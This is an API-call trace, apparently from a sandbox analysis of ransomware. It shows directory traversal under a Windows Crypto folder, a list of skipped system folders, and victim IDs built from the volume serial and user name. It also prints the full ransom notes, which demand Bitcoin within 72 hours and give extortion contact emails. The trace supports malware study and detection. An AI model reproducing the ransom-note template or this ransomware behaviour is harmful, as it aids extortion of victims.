	[0166.622] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc4a8a1, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1
	[0166.622] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd54314ca, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemKeys", cAlternateFileName="SYSTEM~1")) returned 1
	[0166.622] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd54314ca, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemKeys", cAlternateFileName="SYSTEM~1")) returned 0
	[0166.623] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0166.623] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0166.623] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto") returned="C:\\Users\\All Users\\Microsoft\\Crypto"
	[0166.623] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\*.*"
	[0166.623] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.624] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.624] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Crypto\\HELP_DECRYPT_YOUR_FILES.TXT") returned 63
	[0166.624] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\crypto\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0166.630] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0166.630] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0166.633] CloseHandle (hObject=0x384) returned 1
	[0166.633] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.634] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.634] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0166.636] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0166.636] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\crypto\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0166.637] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0166.637] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0166.637] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0166.637] CloseHandle (hObject=0x384) returned 1
	[0166.638] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.638] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.638] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0166.638] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Crypto\\HELP_DECRYPT_YOUR_FILES.HTML") returned 64
	[0166.638] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0166.639] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0166.639] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0166.643] CloseHandle (hObject=0x384) returned 1
	[0166.644] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0166.644] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.644] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.645] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0166.646] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.646] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0166.646] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0166.647] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.647] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0166.647] CloseHandle (hObject=0x384) returned 1
	[0166.647] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\*.*" (normalized: "c:\\users\\all users\\microsoft\\crypto\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x7cd9c2c1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0166.648] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\*.*") returned 39
	[0166.648] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.648] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Crypto\\*.*", cchLength=0x27 | out: lpsz="c:\\users\\all users\\microsoft\\crypto\\*.*") returned 0x27
	[0166.648] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.648] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="windows") returned 0x0
	[0166.648] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.648] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="boot") returned 0x0
	[0166.649] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.649] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="system volume information") returned 0x0
	[0166.649] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.649] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.649] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.649] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="temp") returned 0x0
	[0166.649] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.650] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="program files") returned 0x0
	[0166.650] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.650] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.650] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.650] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="appdata") returned 0x0
	[0166.650] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.650] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="application data") returned 0x0
	[0166.651] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.651] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="winnt") returned 0x0
	[0166.651] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.651] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="tmp") returned 0x0
	[0166.651] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.651] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="cache") returned 0x0
	[0166.651] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.651] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.652] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.652] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="webcache") returned 0x0
	[0166.652] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.652] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="inetcache") returned 0x0
	[0166.652] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.652] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="nvidia") returned 0x0
	[0166.652] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.653] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="packages") returned 0x0
	[0166.653] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.653] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="cookies") returned 0x0
	[0166.653] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.653] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="programdata") returned 0x0
	[0166.653] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0166.653] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0166.654] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x7cd9c2c1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.654] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0166.654] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DSS", cAlternateFileName="")) returned 1
	[0166.654] lstrcmpW (lpString1="DSS", lpString2="..") returned 1
	[0166.654] lstrcmpW (lpString1="DSS", lpString2=".") returned 1
	[0166.654] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto") returned="C:\\Users\\All Users\\Microsoft\\Crypto"
	[0166.654] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\"
	[0166.655] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\", lpString2="DSS" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS"
	[0166.655] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS"
	[0166.655] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\"
	[0166.655] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\"
	[0166.655] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*"
	[0166.655] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0166.655] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*") returned 43
	[0166.656] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.656] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*", cchLength=0x2b | out: lpsz="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*") returned 0x2b
	[0166.663] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.663] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="windows") returned 0x0
	[0166.664] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.664] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="boot") returned 0x0
	[0166.664] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.664] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="system volume information") returned 0x0
	[0166.664] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.664] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.664] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.664] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="temp") returned 0x0
	[0166.665] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.665] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="program files") returned 0x0
	[0166.665] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.665] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.665] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.665] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="appdata") returned 0x0
	[0166.665] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.666] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="application data") returned 0x0
	[0166.666] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.666] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="winnt") returned 0x0
	[0166.666] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.666] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="tmp") returned 0x0
	[0166.666] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.666] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="cache") returned 0x0
	[0166.667] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.667] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.667] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.667] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="webcache") returned 0x0
	[0166.667] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.667] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="inetcache") returned 0x0
	[0166.667] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.667] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="nvidia") returned 0x0
	[0166.668] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.668] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="packages") returned 0x0
	[0166.668] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.668] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="cookies") returned 0x0
	[0166.668] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.668] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="programdata") returned 0x0
	[0166.668] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.669] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1
	[0166.669] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 0
	[0166.669] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0166.669] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0166.670] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS"
	[0166.670] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*"
	[0166.670] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.670] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.670] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\HELP_DECRYPT_YOUR_FILES.TXT") returned 67
	[0166.670] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
